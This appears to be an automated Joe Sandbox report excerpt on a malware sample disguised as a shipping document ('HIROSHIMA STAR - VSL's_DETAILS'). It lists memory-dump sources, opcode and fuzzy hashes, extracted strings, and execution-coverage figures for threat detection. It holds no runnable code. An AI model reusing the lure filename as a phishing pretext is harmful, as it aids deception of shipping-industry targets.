                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: w7e^
                                                                                                                                                                      • API String ID: 0-1657886525
                                                                                                                                                                      • Opcode ID: e02ffc22d8a4dfbd866b45a708ba121b3b726bb2947384a96cd4878d6f39a27a
                                                                                                                                                                      • Instruction ID: 7de170a6122235196092a51c37e9bcb5558201bb511314ac0ab66b2a5b42f74b
                                                                                                                                                                      • Opcode Fuzzy Hash: e02ffc22d8a4dfbd866b45a708ba121b3b726bb2947384a96cd4878d6f39a27a
                                                                                                                                                                      • Instruction Fuzzy Hash: 264136B4D1525ADFCF08CFA6C8406EEFBB5BB8A250F14A82AC015B7254D7784642CF59
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 0ni
                                                                                                                                                                      • API String ID: 0-1488673370
                                                                                                                                                                      • Opcode ID: 17c324d0d34dabd2b6bfd245df8a584915a3ffce1ac8ad04e6cfe2cd0143dfbc
                                                                                                                                                                      • Instruction ID: 6b40f408a501daa7d1db8f01a0866791971ad9f7cd95f754ea8c3d78f056bd7a
                                                                                                                                                                      • Opcode Fuzzy Hash: 17c324d0d34dabd2b6bfd245df8a584915a3ffce1ac8ad04e6cfe2cd0143dfbc
                                                                                                                                                                      • Instruction Fuzzy Hash: BC514CB1E106188BDB68CF6B9D4579EFBF3AFC8301F14C1BA950CA6214EB340A858F51
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 709229d7f33f084b6016b5f9dfc8eddf96184d93f61e81fd13adff66f1ffd58b
                                                                                                                                                                      • Instruction ID: 9c25c29ca9f4a2bd0b9c8589c47acab9d3a1b55629356df3ac3608102c8ec594
                                                                                                                                                                      • Opcode Fuzzy Hash: 709229d7f33f084b6016b5f9dfc8eddf96184d93f61e81fd13adff66f1ffd58b
                                                                                                                                                                      • Instruction Fuzzy Hash: 5F42D374A0121A8FCB64CF69C984BA9FBB2FF48310F15C1A9D419AB751DB31AE85CF50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3f305f272702906e8b6896da14afc4b2797bc7cbc59adfe8d9e3d0b31c59e308
                                                                                                                                                                      • Instruction ID: d9647dae930ca330f3813c3b86874dc2e39cf0d781781587d059b3cc7e0bcc19
                                                                                                                                                                      • Opcode Fuzzy Hash: 3f305f272702906e8b6896da14afc4b2797bc7cbc59adfe8d9e3d0b31c59e308
                                                                                                                                                                      • Instruction Fuzzy Hash: CCD15BB0E022169FCB15DF59C584AADBBF6FF98308F248169D418AB255D735DC82CBE0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1a3efd6cfd8d09781a0ab746976ae09fbf36dfcc3ef3af178339c240503171da
                                                                                                                                                                      • Instruction ID: a0db68381c3a282d571a9a507eb963a2cfd6da18683ef284662bb19031fe805e
                                                                                                                                                                      • Opcode Fuzzy Hash: 1a3efd6cfd8d09781a0ab746976ae09fbf36dfcc3ef3af178339c240503171da
                                                                                                                                                                      • Instruction Fuzzy Hash: 11E11AB4E051199FDB14DFA9C5809AEFBF2FF89314F248169E414AB356D730A942CFA0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4cca3cb87081d5aa3760925c13d322ab7c9f3578291071607bda39398fa68704
                                                                                                                                                                      • Instruction ID: 940a3fd3f696107ec051972784c1366b9beb2516814587a3f413b6e4bfcc1c62
                                                                                                                                                                      • Opcode Fuzzy Hash: 4cca3cb87081d5aa3760925c13d322ab7c9f3578291071607bda39398fa68704
                                                                                                                                                                      • Instruction Fuzzy Hash: AEE13BB4E041199FDB14DFA9C5819AEFBF2FF89304F248169D408AB356D730A942CFA0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4dbe98de39d5dedde71b4644fb1915214268b10a15d9234200396f367c896887
                                                                                                                                                                      • Instruction ID: 75e47034305903d6d14e190ee8dc959699531563d8a095f0fde9fe130aba20a3
                                                                                                                                                                      • Opcode Fuzzy Hash: 4dbe98de39d5dedde71b4644fb1915214268b10a15d9234200396f367c896887
                                                                                                                                                                      • Instruction Fuzzy Hash: 0EE12DB4E051199FDB14DFA9C5809AEFBF2FF89314F248159D414AB356DB30A942CFA0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d253ff2370968dbd83311986eb5f8e6f4eebf59026db9ebb6717c991ba56c31c
                                                                                                                                                                      • Instruction ID: b9e7e4eb25b90b23b0b580048ffd4ee73d133045816317b6ea1d93982ca6f149
                                                                                                                                                                      • Opcode Fuzzy Hash: d253ff2370968dbd83311986eb5f8e6f4eebf59026db9ebb6717c991ba56c31c
                                                                                                                                                                      • Instruction Fuzzy Hash: 33E10AB4E051199FDB14DF99C5849AEFBB2FF89304F248169E414AB35AD730A942CFA0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d414ab0f75f688150d003ddb0bba7a467eb167714e0a3dadf2a564e126088820
                                                                                                                                                                      • Instruction ID: 11af1dab4c38cb157f73cf5d1f71c9a7c8e73732aadf20c14c202af3f83e975e
                                                                                                                                                                      • Opcode Fuzzy Hash: d414ab0f75f688150d003ddb0bba7a467eb167714e0a3dadf2a564e126088820
                                                                                                                                                                      • Instruction Fuzzy Hash: 4BE11AB4E051199FDB14DFA9C5819AEFBB2FF89304F248169E414AB356D730A942CFA0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 274260980e85e925ee9a143c7654e94c4978dcb44ef8483ad57892899ce61b90
                                                                                                                                                                      • Instruction ID: a239744f4558896321f6b8ea94872dbde7975ce646760014981a973449e6a3a5
                                                                                                                                                                      • Opcode Fuzzy Hash: 274260980e85e925ee9a143c7654e94c4978dcb44ef8483ad57892899ce61b90
                                                                                                                                                                      • Instruction Fuzzy Hash: BDD1EA3192075A9ACB14EFA4D990ADDB7B1FF95300F10C79AE0093B255EB706AC9CF91
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2608e753a1167b56328bceea536bcb28e3c75db8a81ac5064ad74c6b4ceabd8d
                                                                                                                                                                      • Instruction ID: b46f107d835d363c5229780a2ebb10aa85966e654bed7c22c3b8e1b589e44f5e
                                                                                                                                                                      • Opcode Fuzzy Hash: 2608e753a1167b56328bceea536bcb28e3c75db8a81ac5064ad74c6b4ceabd8d
                                                                                                                                                                      • Instruction Fuzzy Hash: 91D1DA3192075A9ACB14EFA4D990ADDB7B1FF95300F10C79AE0093B255EB706AC9CF91
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0fdb3bf23079198718b09d3b0178c918c4cb4abbf795a2d8d11cad137a3fc4e4
                                                                                                                                                                      • Instruction ID: 17a559c527a3a6f59b8ebffa5a5168adf0562834f2e2a623886c6dcff1f45398
                                                                                                                                                                      • Opcode Fuzzy Hash: 0fdb3bf23079198718b09d3b0178c918c4cb4abbf795a2d8d11cad137a3fc4e4
                                                                                                                                                                      • Instruction Fuzzy Hash: 54A18C36E0021A8FCF09DFA5C84459EBBB3FF84304B25456AE905AB3A5DB71E915CB81
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1a849bb4d95a7d493ca0a615cffc515f2b573c87db8896dfcbd6735c61ba9561
                                                                                                                                                                      • Instruction ID: 4732fa782a26cb9f69380537f3cc8ae2694d727aff9a6ae3e5b7cc098a7b4062
                                                                                                                                                                      • Opcode Fuzzy Hash: 1a849bb4d95a7d493ca0a615cffc515f2b573c87db8896dfcbd6735c61ba9561
                                                                                                                                                                      • Instruction Fuzzy Hash: 328123B5A2520ADFCB04CFA9C58489EFBF1FF89350F24956AD519AB320D334AA41CF51
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ee10a4bffc52fd586997ffdfbac13abbb78c8bc7c65a602f2e8277d478f0f743
                                                                                                                                                                      • Instruction ID: efb0ac2d0b56b128603658cdf728853ea38aa368e5cd2f9cca5c8d44e75ff5f6
                                                                                                                                                                      • Opcode Fuzzy Hash: ee10a4bffc52fd586997ffdfbac13abbb78c8bc7c65a602f2e8277d478f0f743
                                                                                                                                                                      • Instruction Fuzzy Hash: 049101B0A1520ADFCB04CFA9C58489EFBF2FF89350F259569D519BB220D334AA41CF55
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2d478ad3668721dddd4af2d7c1894d7d3d7877c0e91c40b5556330e308b696e8
                                                                                                                                                                      • Instruction ID: 534239e4c6b010eef59b9bea57c5a659331f387e28771ea11632ac9a0d4f41e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 2d478ad3668721dddd4af2d7c1894d7d3d7877c0e91c40b5556330e308b696e8
                                                                                                                                                                      • Instruction Fuzzy Hash: 8C812CB4E146198FDB54CF69C5809AEFBF2BF89310F24C1A9D418A7256D730AA41CF61
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6ad6d1270430cb3706163ffbc5745dad0fe4a743b324e42bf3c21b58a0c8430e
                                                                                                                                                                      • Instruction ID: f257eab4f14e2a64bf4e840643321b89732f944dfbcda86779cd5309af86740e
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ad6d1270430cb3706163ffbc5745dad0fe4a743b324e42bf3c21b58a0c8430e
                                                                                                                                                                      • Instruction Fuzzy Hash: 907106B4E15619CFCB14CFA9C5819DEFBF2FF89250F24D42AD416BB224D3349A418B68
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c340c3912f478a77a7bf2e120b06719659210e56ab12bb4d8c255bd47681d419
                                                                                                                                                                      • Instruction ID: 09cc6bf6aa432b9e5993183c0cd81b50687856f4eff7abd669b5f3e9c9723cae
                                                                                                                                                                      • Opcode Fuzzy Hash: c340c3912f478a77a7bf2e120b06719659210e56ab12bb4d8c255bd47681d419
                                                                                                                                                                      • Instruction Fuzzy Hash: 4B7115B4E15619CFCB04CFA9C5815DEFBF2FF89250F24D42AD416B7264D3349A428B68
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: b12befab8662458e8cac4b7b472224ef0c82d22e500625ac654cdaf5f1005e6e
                                                                                                                                                                      • Instruction ID: 4173c20bc8dec316e48478cc2f0b648068cebb32cd3a3158232352833cfc84fe
                                                                                                                                                                      • Opcode Fuzzy Hash: b12befab8662458e8cac4b7b472224ef0c82d22e500625ac654cdaf5f1005e6e
                                                                                                                                                                      • Instruction Fuzzy Hash: A55128B0E052198FDB14CFA9C5815AEFBF2BF89314F248169D418AB356D730A942CFA0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9c08525c2193d3264b2acbd996f5b3a8d8071331617da42d72268e1f38f7b2d9
                                                                                                                                                                      • Instruction ID: e694d52d42fcc0e80c40674d93f95ad1c1b43ef097b6d2c1b5f8845709da131b
                                                                                                                                                                      • Opcode Fuzzy Hash: 9c08525c2193d3264b2acbd996f5b3a8d8071331617da42d72268e1f38f7b2d9
                                                                                                                                                                      • Instruction Fuzzy Hash: CC5128B0E052199BDB14CFA9C5855AEFBB2BF89304F24C169D408AB355DB31A942CFA1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 71a6846e7e72183a45161663097d59703c44b535a4a8e53766887d8b4839a738
                                                                                                                                                                      • Instruction ID: c32be4ac1636fc067a3187ebfbfa16e7f550151b0b5e543de1f00754d9839b95
                                                                                                                                                                      • Opcode Fuzzy Hash: 71a6846e7e72183a45161663097d59703c44b535a4a8e53766887d8b4839a738
                                                                                                                                                                      • Instruction Fuzzy Hash: 86416DB0E1560ADFCB04CFA9D5416AEFBF2FF89350F20D46AD014A7264D37487418B90
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9393709d17210f5773de8a920674bb9ec6be3bdd748d302d47609b44d47cb744
                                                                                                                                                                      • Instruction ID: fbfc07436cdfc39e29da62f1527efdc83f0dc5249ebe371307e18dfb48009e80
                                                                                                                                                                      • Opcode Fuzzy Hash: 9393709d17210f5773de8a920674bb9ec6be3bdd748d302d47609b44d47cb744
                                                                                                                                                                      • Instruction Fuzzy Hash: 824127B4E0520ACBCB44CFAAC5815EEFBF2EF89340F24D46AC515A7264D7309A418FA5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3a204e4fb7b46631d6443b4e71112e925871bb5004b9dcbe34128f15a0642fbb
                                                                                                                                                                      • Instruction ID: 90e7647b7927ca7bb4d4a48b079750b7d3e1ac6bc975e7924781ca97cbe0dfd0
                                                                                                                                                                      • Opcode Fuzzy Hash: 3a204e4fb7b46631d6443b4e71112e925871bb5004b9dcbe34128f15a0642fbb
                                                                                                                                                                      • Instruction Fuzzy Hash: F041F7F0E0520ADBCB44CFAAC5815AEFBF2FF88340F24D56AC515B7224D7309A418BA4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9d8344dfbb7f931b3408b914149981299341f38a43866327b3af55f4c7e1b55c
                                                                                                                                                                      • Instruction ID: eb11fb7695f8e25c1670293f1c1dabec64cfbb47635de3c5eb48fe96ce997c71
                                                                                                                                                                      • Opcode Fuzzy Hash: 9d8344dfbb7f931b3408b914149981299341f38a43866327b3af55f4c7e1b55c
                                                                                                                                                                      • Instruction Fuzzy Hash: 93414BB0E1560ADFCB48CFAAD5456AEFBF2BF89250F20D46AC014B7264E37497418B94
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 061b4d52258fbc8be093110ad274c625d609d84a89bd084a356dd2eb5266824e
                                                                                                                                                                      • Instruction ID: db946f579abfd5effbf30925a9d9f6aa67b4eb525e94ba5ad5b5e52a9c620ed0
                                                                                                                                                                      • Opcode Fuzzy Hash: 061b4d52258fbc8be093110ad274c625d609d84a89bd084a356dd2eb5266824e
                                                                                                                                                                      • Instruction Fuzzy Hash: 0741F2B0E0560ADFCB48CFAAD4816EEFBF2AF89340F14C46AD415A7254D7349A41CFA4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9343e015e7fdfe6a80b63c1e79e3f16c31ef910406d84049a8f8625967a14864
                                                                                                                                                                      • Instruction ID: 5a4c1bd3e20acf3d50ef4d46904c42155bedae07983ee2d8d06a10ad9d242ccb
                                                                                                                                                                      • Opcode Fuzzy Hash: 9343e015e7fdfe6a80b63c1e79e3f16c31ef910406d84049a8f8625967a14864
                                                                                                                                                                      • Instruction Fuzzy Hash: 5141DFB0E0460ADFCB48CFAAD4815AEFBF2BF89340F25C46AD415B7214D7359A418FA4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4c4eb153b01a8a38f9a94203d20977db029eb7a2dd58dd65390a2659e817121f
                                                                                                                                                                      • Instruction ID: 28366319d00a648d8dad5d3d4eb752698ac99db24d131d18541695772f693c64
                                                                                                                                                                      • Opcode Fuzzy Hash: 4c4eb153b01a8a38f9a94203d20977db029eb7a2dd58dd65390a2659e817121f
                                                                                                                                                                      • Instruction Fuzzy Hash: C4210EB1E046189BEB18CFAB98006DEFBF3AFC9200F04C07AD418A6254EB3416558F61
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                      • API String ID: 0-2822668367
                                                                                                                                                                      • Opcode ID: 7e22fc23beb29142831d913de4c61f97795d949fcd821343a7dd70aa27a4080d
                                                                                                                                                                      • Instruction ID: b5b0549f3f11369036513126556e5540afe7f00ae61a74f664992746be7d0e0d
                                                                                                                                                                      • Opcode Fuzzy Hash: 7e22fc23beb29142831d913de4c61f97795d949fcd821343a7dd70aa27a4080d
                                                                                                                                                                      • Instruction Fuzzy Hash: A8417E34D813168FCB08EF75F85199E7BB2FB44204B8049ADD005ABAE9EF386955CF91
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1734595504.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5c30000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                      • API String ID: 0-2822668367
                                                                                                                                                                      • Opcode ID: 887fc657d0cc9c70a95d84ff8cdb871d4dd8ee78ac856465df2467741487df72
                                                                                                                                                                      • Instruction ID: 107313710ce36d2bf0d2cc48fb1e361b95cd9bac29a6840dbf5c6fcd39dcf4a5
                                                                                                                                                                      • Opcode Fuzzy Hash: 887fc657d0cc9c70a95d84ff8cdb871d4dd8ee78ac856465df2467741487df72
                                                                                                                                                                      • Instruction Fuzzy Hash: 39412F34D813168FCB08EF65F55199E77B2FB44304BC049A9D005ABAE8EF386955CF91

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:14.9%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:25.8%
                                                                                                                                                                      Total number of Nodes:31
                                                                                                                                                                      Total number of Limit Nodes:5
